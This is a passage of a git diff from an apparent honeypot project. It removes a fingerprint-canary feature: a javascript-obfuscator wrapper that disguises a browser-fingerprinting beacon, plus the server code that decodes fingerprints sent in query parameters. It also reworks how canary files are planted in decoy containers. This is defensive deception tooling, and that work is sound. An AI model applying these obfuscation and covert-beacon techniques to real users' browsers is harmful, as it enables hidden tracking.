dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
|
||||
transform_object_keys = bool((bits >> 17) & 1)
|
||||
numbers_to_expressions = bool((bits >> 18) & 1)
|
||||
simplify = bool((bits >> 19) & 1)
|
||||
return {
|
||||
"compact": True,
|
||||
"seed": seed,
|
||||
"controlFlowFlattening": True,
|
||||
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
|
||||
"deadCodeInjection": True,
|
||||
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
|
||||
"stringArray": True,
|
||||
"stringArrayEncoding": string_array_encoding,
|
||||
"stringArrayThreshold": 1,
|
||||
"stringArrayRotate": True,
|
||||
"stringArrayShuffle": True,
|
||||
"splitStrings": True,
|
||||
"splitStringsChunkLength": 4 + (bits & 7),
|
||||
"transformObjectKeys": transform_object_keys,
|
||||
"numbersToExpressions": numbers_to_expressions,
|
||||
"simplify": simplify,
|
||||
"selfDefending": False, # breaks SVG embed; not worth the cost
|
||||
"renameGlobals": False,
|
||||
"identifierNamesGenerator": "mangled-shuffled",
|
||||
}
|
||||
|
||||
|
||||
def obfuscate(code: str, *, callback_token: str) -> str:
|
||||
"""Obfuscate *code* deterministically per *callback_token*.
|
||||
|
||||
Raises :class:`ObfuscatorError` if Node fails or returns empty.
|
||||
"""
|
||||
seed = _seed_from_token(callback_token)
|
||||
options = _config_from_seed(seed)
|
||||
payload = json.dumps({"code": code, "options": options})
|
||||
try:
|
||||
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
|
||||
[_NODE_BIN, str(_HELPER)],
|
||||
input=payload, capture_output=True, text=True,
|
||||
timeout=_TIMEOUT_S, check=False,
|
||||
)
|
||||
except FileNotFoundError as e:
|
||||
raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
|
||||
except subprocess.TimeoutExpired as e:
|
||||
raise ObfuscatorError("javascript-obfuscator timed out") from e
|
||||
if proc.returncode != 0:
|
||||
raise ObfuscatorError(
|
||||
f"javascript-obfuscator failed rc={proc.returncode} "
|
||||
f"stderr={proc.stderr.strip()[:400]}"
|
||||
)
|
||||
out = proc.stdout
|
||||
if not out.strip():
|
||||
raise ObfuscatorError("javascript-obfuscator returned empty output")
|
||||
return out
|
||||
|
||||
|
||||
def render_fingerprint_js(
|
||||
*, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
|
||||
) -> str:
|
||||
"""Build the obfuscated fingerprint JS for a single mint.
|
||||
|
||||
Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
|
||||
``{{MINT_NONCE}}`` in the payload template, then runs it through
|
||||
:func:`obfuscate` with a seed derived from the callback token.
|
||||
The nonce is appended as ``&k=`` on every beacon URL the JS emits;
|
||||
the worker rejects fingerprint payloads whose ``?k=`` doesn't match
|
||||
the row's :attr:`CanaryToken.fingerprint_nonce`.
|
||||
"""
|
||||
template = _PAYLOAD.read_text(encoding="utf-8")
|
||||
beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
|
||||
src = (
|
||||
template
|
||||
.replace("{{BEACON_URL}}", beacon)
|
||||
.replace("{{MINT_UUID}}", mint_uuid)
|
||||
.replace("{{MINT_NONCE}}", nonce)
|
||||
)
|
||||
return obfuscate(src, callback_token=callback_token)
|
||||
@@ -1,10 +0,0 @@
|
||||
{
|
||||
"name": "decnet-canary-obfuscator",
|
||||
"version": "0.1.0",
|
||||
"private": true,
|
||||
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
|
||||
"main": "_obfuscate_helper.js",
|
||||
"dependencies": {
|
||||
"javascript-obfuscator": "^5.4.2"
|
||||
}
|
||||
}
|
||||
@@ -28,8 +28,6 @@ _LINUX_DEFAULTS: dict[str, str] = {
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||
}
|
||||
|
||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||
@@ -40,8 +38,6 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||
}
|
||||
|
||||
|
||||
|
||||
@@ -20,8 +20,11 @@ shape but speaks bytes-via-base64 over the wire.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import os
|
||||
from datetime import datetime, timedelta, timezone
|
||||
import shlex
|
||||
import time
|
||||
from secrets import token_urlsafe
|
||||
from typing import Any, Iterable, Optional
|
||||
|
||||
@@ -31,16 +34,13 @@ from decnet.bus.factory import get_bus
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||
from decnet.canary.factory import get_generator
|
||||
from decnet.canary.paths import default_path_for
|
||||
from decnet.decky_io import (
|
||||
delete_file_from_container,
|
||||
resolve_topology_container,
|
||||
write_file_to_container,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
log = get_logger("canary.planter")
|
||||
|
||||
_DOCKER = "docker"
|
||||
_TIMEOUT = 8.0
|
||||
# Container suffix — matches the orchestrator SSH driver's convention
|
||||
# (``<decky_name>-ssh``). Canary placement always happens through the
|
||||
# ssh container because every decky has one and it carries the most
|
||||
@@ -52,16 +52,62 @@ def _container_for(decky_name: str) -> str:
|
||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||
|
||||
|
||||
# resolve_topology_container is re-exported from decky_io for back-compat
|
||||
# with callers (tests, deploy hook) that imported it from this module
|
||||
# before the decky_io extraction.
|
||||
__all__ = [
|
||||
"plant",
|
||||
"revoke",
|
||||
"resolve_topology_container",
|
||||
"seed_baseline",
|
||||
"seed_baseline_topology",
|
||||
]
|
||||
def _dirname(path: str) -> str:
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
|
||||
async def _run(
|
||||
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
|
||||
) -> tuple[int, str, str]:
|
||||
try:
|
||||
proc = await asyncio.create_subprocess_exec(
|
||||
*argv,
|
||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
||||
stdout=asyncio.subprocess.PIPE,
|
||||
stderr=asyncio.subprocess.PIPE,
|
||||
)
|
||||
except FileNotFoundError as exc:
|
||||
return 127, "", f"argv[0] not found: {exc}"
|
||||
try:
|
||||
stdout, stderr = await asyncio.wait_for(
|
||||
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
|
||||
)
|
||||
except asyncio.TimeoutError:
|
||||
try:
|
||||
proc.kill()
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
return 124, "", "timeout"
|
||||
return (
|
||||
proc.returncode if proc.returncode is not None else -1,
|
||||
stdout.decode("utf-8", "replace"),
|
||||
stderr.decode("utf-8", "replace"),
|
||||
)
|
||||
|
||||
|
||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
|
||||
"""Compose the ``sh -c`` script + stdin payload for one artifact.
|
||||
|
||||
Binary safety: we base64-encode on the host and stream the result
|
||||
over stdin to ``base64 -d`` inside the container, so the bytes
|
||||
never touch the argv (kernel ARG_MAX would reject anything larger
|
||||
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
|
||||
and ``touch -d @<unix_ts>`` are present on every Linux base image
|
||||
we ship, so there's no per-distro branching.
|
||||
"""
|
||||
encoded = base64.b64encode(artifact.content)
|
||||
mtime = int(time.time() + artifact.mtime_offset)
|
||||
mode_str = oct(artifact.mode)[2:]
|
||||
parts = [
|
||||
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
|
||||
f"base64 -d > {shlex.quote(artifact.path)}",
|
||||
f"chmod {mode_str} {shlex.quote(artifact.path)}",
|
||||
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
|
||||
]
|
||||
return " && ".join(parts), encoded
|
||||
|
||||
|
||||
async def _publish(
|
||||
@@ -93,7 +139,6 @@ async def plant(
|
||||
repo: Optional[BaseRepository] = None,
|
||||
publish: bool = True,
|
||||
bus: Optional[BaseBus] = None,
|
||||
container: Optional[str] = None,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Write *artifact* into the decky's ssh container.
|
||||
|
||||
@@ -112,12 +157,13 @@ async def plant(
|
||||
await repo.update_canary_token_state(token_uuid, "failed", err)
|
||||
return False, err
|
||||
|
||||
target_container = container or _container_for(decky_name)
|
||||
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
|
||||
success, error = await write_file_to_container(
|
||||
target_container, artifact.path, artifact.content,
|
||||
mode=artifact.mode, mtime=mtime,
|
||||
)
|
||||
sh_cmd, stdin_payload = _build_plant_command(artifact)
|
||||
# ``-i`` keeps stdin attached so base64 -d inside the container can
|
||||
# consume the encoded payload streamed from the host.
|
||||
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
|
||||
success = rc == 0
|
||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
||||
|
||||
if repo is not None:
|
||||
if success:
|
||||
@@ -136,8 +182,8 @@ async def plant(
|
||||
|
||||
if not success:
|
||||
log.warning(
|
||||
"canary.plant failed decky=%s token=%s container=%s err=%r",
|
||||
decky_name, token_uuid, target_container, error,
|
||||
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
|
||||
decky_name, token_uuid, rc, stderr[:120],
|
||||
)
|
||||
return success, error
|
||||
|
||||
@@ -150,7 +196,6 @@ async def revoke(
|
||||
repo: Optional[BaseRepository] = None,
|
||||
publish: bool = True,
|
||||
bus: Optional[BaseBus] = None,
|
||||
container: Optional[str] = None,
|
||||
) -> tuple[bool, Optional[str]]:
|
||||
"""Best-effort unlink + state transition + bus publish.
|
||||
|
||||
@@ -158,10 +203,11 @@ async def revoke(
|
||||
the file is gone after the call (whether we deleted it or it was
|
||||
already missing); only docker / container-down errors return False.
|
||||
"""
|
||||
target_container = container or _container_for(decky_name)
|
||||
success, error = await delete_file_from_container(
|
||||
target_container, placement_path,
|
||||
)
|
||||
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
|
||||
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run(argv)
|
||||
success = rc == 0
|
||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
||||
|
||||
if repo is not None:
|
||||
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
||||
@@ -204,7 +250,6 @@ async def seed_baseline(
|
||||
persona: str = "linux",
|
||||
created_by: str = "system",
|
||||
bus: Optional[BaseBus] = None,
|
||||
container: Optional[str] = None,
|
||||
) -> list[dict[str, Any]]:
|
||||
"""Plant the configured baseline canary set on one decky.
|
||||
|
||||
@@ -248,59 +293,9 @@ async def seed_baseline(
|
||||
await plant(
|
||||
decky_name, artifact,
|
||||
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
||||
container=container,
|
||||
)
|
||||
out.append({
|
||||
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
||||
"callback_token": slug, "placement_path": artifact.path,
|
||||
})
|
||||
return out
|
||||
|
||||
|
||||
async def seed_baseline_topology(
|
||||
repo: BaseRepository,
|
||||
topology_id: str,
|
||||
*,
|
||||
created_by: str = "system",
|
||||
bus: Optional[BaseBus] = None,
|
||||
) -> list[dict[str, Any]]:
|
||||
"""Plant baseline canaries on every decky in a MazeNET topology.
|
||||
|
||||
Mirrors :func:`seed_baseline` for the topology path. Container name
|
||||
resolution uses :func:`resolve_topology_container` since topology
|
||||
deckies may not have an ssh service — in that case we target the
|
||||
base container instead.
|
||||
|
||||
Best-effort: failures on any single decky are logged inside
|
||||
:func:`plant`; the deploy hook treats the return value as
|
||||
informational. Returns a flat list of per-token dicts (with an added
|
||||
``decky_name`` key) across all deckies.
|
||||
"""
|
||||
from decnet.topology.persistence import hydrate
|
||||
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None:
|
||||
log.warning(
|
||||
"canary.seed_baseline_topology: topology %s not found", topology_id,
|
||||
)
|
||||
return []
|
||||
|
||||
out: list[dict[str, Any]] = []
|
||||
for decky in hydrated["deckies"]:
|
||||
cfg = decky.get("decky_config") or {}
|
||||
decky_name = cfg.get("name") or decky.get("name")
|
||||
if not decky_name:
|
||||
continue
|
||||
services = decky.get("services") or []
|
||||
container = resolve_topology_container(topology_id, decky_name, services)
|
||||
# MazeNET deckies don't carry an OS persona today; default to
|
||||
# linux (every base image we ship is Linux).
|
||||
rows = await seed_baseline(
|
||||
decky_name, repo,
|
||||
persona="linux", created_by=created_by, bus=bus,
|
||||
container=container,
|
||||
)
|
||||
for r in rows:
|
||||
r["decky_name"] = decky_name
|
||||
out.append(r)
|
||||
return out
|
||||
|
||||
@@ -26,14 +26,9 @@ crashes loudly rather than masking failures.
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import binascii
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
from typing import Optional
|
||||
|
||||
from fastapi import FastAPI, Request, Response
|
||||
|
||||
@@ -55,41 +50,6 @@ _TRANSPARENT_GIF = bytes.fromhex(
|
||||
)
|
||||
|
||||
|
||||
# Namespace used by fingerprint generators to derive mint UUID.
|
||||
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
|
||||
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||
|
||||
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
|
||||
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
|
||||
# Not shared across worker restarts or processes — acceptable for MVP.
|
||||
_FP_RATE_WINDOW_S = 60
|
||||
_FP_RATE_LIMIT = 30
|
||||
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
|
||||
|
||||
|
||||
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
|
||||
key = (token_uuid, src_ip)
|
||||
now = time.monotonic()
|
||||
cutoff = now - _FP_RATE_WINDOW_S
|
||||
bucket = _fp_rate_buckets.get(key, [])
|
||||
bucket = [t for t in bucket if t > cutoff]
|
||||
if len(bucket) >= _FP_RATE_LIMIT:
|
||||
_fp_rate_buckets[key] = bucket
|
||||
return False
|
||||
bucket.append(now)
|
||||
_fp_rate_buckets[key] = bucket
|
||||
return True
|
||||
|
||||
|
||||
def _is_valid_fp_shape(fp: dict) -> bool:
|
||||
"""Layer B — structural sanity check on a decoded fingerprint blob."""
|
||||
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
|
||||
return False
|
||||
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
|
||||
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
|
||||
return present >= 3
|
||||
|
||||
|
||||
def _http_base() -> str:
|
||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||
|
||||
@@ -144,11 +104,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
||||
|
||||
@app.get("/c/{slug}")
|
||||
async def callback(slug: str, request: Request) -> Response:
|
||||
raw_nonce = request.query_params.get("k")
|
||||
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
|
||||
merged_headers = dict(request.headers)
|
||||
if fp_meta:
|
||||
merged_headers.update(fp_meta)
|
||||
await _record_hit(
|
||||
repo, bus,
|
||||
slug=slug,
|
||||
@@ -156,9 +111,7 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
||||
user_agent=request.headers.get("user-agent"),
|
||||
request_path=str(request.url.path),
|
||||
dns_qname=None,
|
||||
raw_headers=merged_headers,
|
||||
parsed_fp=parsed_fp,
|
||||
raw_nonce=raw_nonce,
|
||||
raw_headers=dict(request.headers),
|
||||
)
|
||||
# Always 200 with a tiny image so the attacker's client sees
|
||||
# a "success" — same return regardless of whether the slug is
|
||||
@@ -176,67 +129,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
||||
return app
|
||||
|
||||
|
||||
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
|
||||
# overflow is handled via chunking (s/i/n + d). Anything larger than
|
||||
# this on a single request is junk, so we drop it instead of letting an
|
||||
# attacker inflate a trigger row indefinitely.
|
||||
_FP_CHUNK_MAX = 8 * 1024
|
||||
|
||||
|
||||
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
|
||||
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
|
||||
|
||||
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
|
||||
|
||||
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
|
||||
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
|
||||
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
|
||||
|
||||
Returns a tuple of:
|
||||
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
|
||||
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
|
||||
when there's no ``?d=`` or decoding fails.
|
||||
"""
|
||||
out: dict[str, Any] = {}
|
||||
parsed_fp: Optional[dict] = None
|
||||
if not qp:
|
||||
return out, parsed_fp
|
||||
o = qp.get("o") if hasattr(qp, "get") else None
|
||||
if o:
|
||||
out["_fp_open"] = "1"
|
||||
d = qp.get("d") if hasattr(qp, "get") else None
|
||||
if not d:
|
||||
return out, parsed_fp
|
||||
if len(d) > _FP_CHUNK_MAX:
|
||||
out["_fp_oversize"] = "1"
|
||||
return out, parsed_fp
|
||||
|
||||
sid = qp.get("s")
|
||||
idx = qp.get("i")
|
||||
total = qp.get("n")
|
||||
if sid and idx and total:
|
||||
out["_fp_sid"] = sid
|
||||
out["_fp_idx"] = idx
|
||||
out["_fp_total"] = total
|
||||
out["_fp_chunk"] = d
|
||||
return out, parsed_fp
|
||||
|
||||
# Single-shot: decode and pass back as parsed_fp; validation runs in
|
||||
# _record_hit after token lookup so we have the stored nonce at hand.
|
||||
try:
|
||||
padded = d + "=" * (-len(d) % 4)
|
||||
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
|
||||
parsed = json.loads(raw.decode("utf-8"))
|
||||
except (binascii.Error, ValueError, UnicodeDecodeError):
|
||||
out["_fp_decode_error"] = "1"
|
||||
return out, parsed_fp
|
||||
if isinstance(parsed, dict):
|
||||
parsed_fp = parsed
|
||||
else:
|
||||
out["_fp_decode_error"] = "1"
|
||||
return out, parsed_fp
|
||||
|
||||
|
||||
def _client_ip(request: Request) -> str:
|
||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||
# proxy. Take the leftmost address in the chain; everything after
|
||||
@@ -262,58 +154,16 @@ async def _record_hit(
|
||||
request_path: Optional[str],
|
||||
dns_qname: Optional[str],
|
||||
raw_headers: Optional[dict],
|
||||
parsed_fp: Optional[dict] = None,
|
||||
raw_nonce: Optional[str] = None,
|
||||
) -> None:
|
||||
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
||||
|
||||
Unknown slugs are silently swallowed: returning the same response
|
||||
for known and unknown slugs is the stealth posture, and persisting
|
||||
every random scan would clutter the DB.
|
||||
|
||||
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
|
||||
it is validated through four layers before being merged into raw_headers:
|
||||
A) nonce match against CanaryToken.fingerprint_nonce,
|
||||
B) structural shape check,
|
||||
C) mint UUID consistency,
|
||||
D) per-(token, IP) rate limit.
|
||||
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
|
||||
The trigger row always lands regardless — the GET hit is itself forensic.
|
||||
"""
|
||||
token = await repo.get_canary_token_by_slug(slug)
|
||||
if token is None:
|
||||
return
|
||||
|
||||
final_headers: dict[str, Any] = dict(raw_headers or {})
|
||||
|
||||
if parsed_fp is not None:
|
||||
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
|
||||
|
||||
# Layer A — nonce
|
||||
if stored_nonce is not None and raw_nonce != stored_nonce:
|
||||
final_headers["_fp_invalid_nonce"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
# Layer B — shape (only when nonce passed or no nonce enforced)
|
||||
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
|
||||
final_headers["_fp_invalid_shape"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
# Layer C — mint UUID consistency
|
||||
if parsed_fp is not None:
|
||||
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
|
||||
if parsed_fp.get("mint") != expected_mint:
|
||||
final_headers["_fp_invalid_mint"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
# Layer D — rate limit
|
||||
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
|
||||
final_headers["_fp_rate_limited"] = "1"
|
||||
parsed_fp = None
|
||||
|
||||
if parsed_fp is not None:
|
||||
final_headers["_fp"] = parsed_fp
|
||||
|
||||
trigger_id = await repo.record_canary_trigger({
|
||||
"token_uuid": token["uuid"],
|
||||
"occurred_at": datetime.now(timezone.utc),
|
||||
@@ -321,7 +171,7 @@ async def _record_hit(
|
||||
"user_agent": user_agent,
|
||||
"request_path": request_path,
|
||||
"dns_qname": dns_qname,
|
||||
"raw_headers": final_headers,
|
||||
"raw_headers": raw_headers or {},
|
||||
})
|
||||
try:
|
||||
await bus.publish(
|
||||
@@ -339,22 +189,6 @@ async def _record_hit(
|
||||
except Exception as e: # noqa: BLE001 — best effort
|
||||
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||
|
||||
# Auto-deregister fingerprint canaries after the first valid fingerprint
|
||||
# is collected. Slug goes dark; the stealth posture means the attacker
|
||||
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
|
||||
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
|
||||
# http/dns canaries are NOT auto-revoked.
|
||||
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
|
||||
try:
|
||||
await repo.update_canary_token_state(token["uuid"], "revoked")
|
||||
await bus.publish(
|
||||
topics.canary(token["uuid"], topics.CANARY_REVOKED),
|
||||
{"token_id": token["uuid"], "trigger_id": trigger_id,
|
||||
"reason": "fingerprint_collected"},
|
||||
)
|
||||
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
|
||||
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
|
||||
|
||||
|
||||
# ---------------------------- DNS surface --------------------------------
|
||||
|
||||
@@ -380,7 +214,7 @@ async def _start_dns_server(
|
||||
local_addr=(_dns_bind(), _dns_port()),
|
||||
)
|
||||
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
|
||||
return transport
|
||||
return transport # type: ignore[return-value]
|
||||
|
||||
|
||||
# ---------------------------- entry point --------------------------------
|
||||
|
||||
@@ -39,7 +39,6 @@ from . import (
|
||||
swarm,
|
||||
swarmctl,
|
||||
topology,
|
||||
ttp,
|
||||
updater,
|
||||
web,
|
||||
webhook,
|
||||
@@ -60,7 +59,7 @@ for _mod in (
|
||||
swarm,
|
||||
deploy, lifecycle, workers, inventory,
|
||||
web, profiler, orchestrator, realism, reconciler, sniffer, db,
|
||||
topology, bus, geoip, init, webhook, canary, ttp,
|
||||
topology, bus, geoip, init, webhook, canary,
|
||||
):
|
||||
_mod.register(app)
|
||||
|
||||
|
||||
@@ -1,13 +1,8 @@
|
||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||
|
||||
Two entry points share this module:
|
||||
|
||||
* ``decnet canary`` — runs the worker process. Mirrors the shape of
|
||||
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
|
||||
systemd unit so its argv must stay stable.
|
||||
* ``decnet canary-install-toolchain`` — provisions the Node side of
|
||||
the fingerprint-canary obfuscator. Idempotent; safe to call from
|
||||
the API service unit's ``ExecStartPre``.
|
||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
||||
:func:`decnet.canary.worker.run`.
|
||||
|
||||
Not master-only — any host that hosts deckies can run its own
|
||||
canary worker (the bus events stay local; the webhook worker on
|
||||
@@ -16,17 +11,11 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import shutil
|
||||
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
|
||||
from pathlib import Path
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
_TOOLCHAIN_TIMEOUT_S = 180
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="canary")
|
||||
@@ -51,53 +40,3 @@ def register(app: typer.Typer) -> None:
|
||||
asyncio.run(run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Canary worker stopped.[/]")
|
||||
|
||||
@app.command(name="canary-install-toolchain")
|
||||
def canary_install_toolchain(
|
||||
npm_bin: str = typer.Option(
|
||||
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
|
||||
),
|
||||
) -> None:
|
||||
"""Install the Node-side toolchain used by fingerprint canaries.
|
||||
|
||||
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
|
||||
directory so the obfuscator's helper script can ``require()``
|
||||
``javascript-obfuscator`` at mint time. Requires Node >= 18.
|
||||
|
||||
Idempotent: re-running on an already-installed tree is fast
|
||||
(npm short-circuits when ``node_modules/`` is up-to-date).
|
||||
"""
|
||||
import decnet.canary as _canary_pkg
|
||||
canary_dir = Path(_canary_pkg.__file__).resolve().parent
|
||||
if not (canary_dir / "package.json").is_file():
|
||||
console.print(
|
||||
f"[red]canary package.json not found under {canary_dir}; "
|
||||
"wheel may be missing the JS toolchain payload.[/]"
|
||||
)
|
||||
raise typer.Exit(code=2)
|
||||
if shutil.which(npm_bin) is None:
|
||||
console.print(
|
||||
f"[red]npm executable {npm_bin!r} not found on PATH. "
|
||||
"Install Node >= 18 and re-run.[/]"
|
||||
)
|
||||
raise typer.Exit(code=2)
|
||||
console.print(
|
||||
f"[cyan]installing canary toolchain[/] in {canary_dir}",
|
||||
)
|
||||
try:
|
||||
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
|
||||
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
|
||||
cwd=str(canary_dir),
|
||||
capture_output=True, text=True,
|
||||
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
|
||||
)
|
||||
except subprocess.TimeoutExpired:
|
||||
console.print("[red]npm install timed out after 3 minutes[/]")
|
||||
raise typer.Exit(code=3) from None
|
||||
if proc.returncode != 0:
|
||||
console.print(
|
||||
f"[red]npm install failed rc={proc.returncode}[/]\n"
|
||||
f"{proc.stderr.strip()}"
|
||||
)
|
||||
raise typer.Exit(code=proc.returncode)
|
||||
console.print("[green]canary toolchain ready[/]")
|
||||
|
||||
@@ -30,10 +30,6 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
|
||||
"mutate", "listener", "profiler",
|
||||
"services", "distros", "correlate", "archetypes", "web",
|
||||
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
|
||||
# `ttp` runs on agents — local SMTP decoys persist .eml files into the
|
||||
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
|
||||
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
|
||||
"ttp-backfill",
|
||||
})
|
||||
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
|
||||
{"swarm", "topology", "geoip", "realism"}
|
||||
@@ -69,7 +65,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
|
||||
return
|
||||
_app.registered_commands = [
|
||||
c for c in _app.registered_commands
|
||||
if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
|
||||
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
|
||||
]
|
||||
_app.registered_groups = [
|
||||
g for g in _app.registered_groups
|
||||
|
||||
@@ -44,12 +44,6 @@ _CONFIG_PLACEHOLDER = """\
|
||||
# EnvironmentFile= — never in a group-readable INI.
|
||||
|
||||
[decnet]
|
||||
# DECNET-service user/group as configured at `decnet init` time.
|
||||
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
|
||||
# so the same user name can have different numeric uids on master vs
|
||||
# agents without breaking artifact ownership.
|
||||
api-user = {api_user}
|
||||
api-group = {api_group}
|
||||
# mode = master # or "agent"
|
||||
|
||||
# [api]
|
||||
@@ -80,7 +74,6 @@ api-group = {api_group}
|
||||
# master-host = 10.0.0.1
|
||||
# syslog-port = 6514
|
||||
# swarmctl-port = 8770
|
||||
# swarmctl-host = 127.0.0.1
|
||||
|
||||
# [logging]
|
||||
# system-log = /var/log/decnet/decnet.system.log
|
||||
@@ -204,17 +197,14 @@ def _ensure_dir(
|
||||
